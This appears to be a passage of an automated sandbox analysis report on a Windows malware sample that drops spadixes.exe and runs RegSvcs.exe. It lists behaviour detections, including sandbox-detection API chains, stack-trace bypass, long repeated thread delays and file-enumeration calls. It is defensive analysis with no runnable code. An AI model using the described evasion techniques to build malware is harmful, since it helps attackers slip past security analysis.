
                barindex
                Found API chain indicative of sandbox detection
                Source: C:\Users\user\Desktop\RubzLi27lr.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97243
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAPI/Special instruction interceptor: Address: 139F24C
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAPI/Special instruction interceptor: Address: 17BED7C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599228Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598886Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598770Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598479Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598372Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596624Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596023Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598971Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598603Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598342Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596310Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594981Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594873Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594000Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2489Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7350Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2925Jump to behavior
                Source: C:\Users\user\Desktop\RubzLi27lr.exeAPI coverage: 3.7 %
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeAPI coverage: 4.0 %
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B1DBBE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AEC2A2 FindFirstFileExW,0_2_00AEC2A2
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B268EE FindFirstFileW,FindClose,0_2_00B268EE
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B2698F
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B1D076
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B1D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B1D3A9
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B29642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B29642
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B2979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B2979D
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B29B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B29B2B
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00B25C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B25C97
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0094DBBE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0091C2A2 FindFirstFileExW,2_2_0091C2A2
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_009568EE FindFirstFileW,FindClose,2_2_009568EE
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0095698F
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0094D076
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0094D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0094D3A9
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00959642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00959642
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_0095979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0095979D
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00959B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00959B2B
                Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exeCode function: 2_2_00955C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00955C97
                Source: C:\Users\user\Desktop\RubzLi27lr.exeCode function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AB42DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599671Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599228Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598886Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598770Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598479Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598372Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596843Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596624Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596296Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596023Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595899Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598971Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598603Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598342Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597516Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596310Jump to behavior
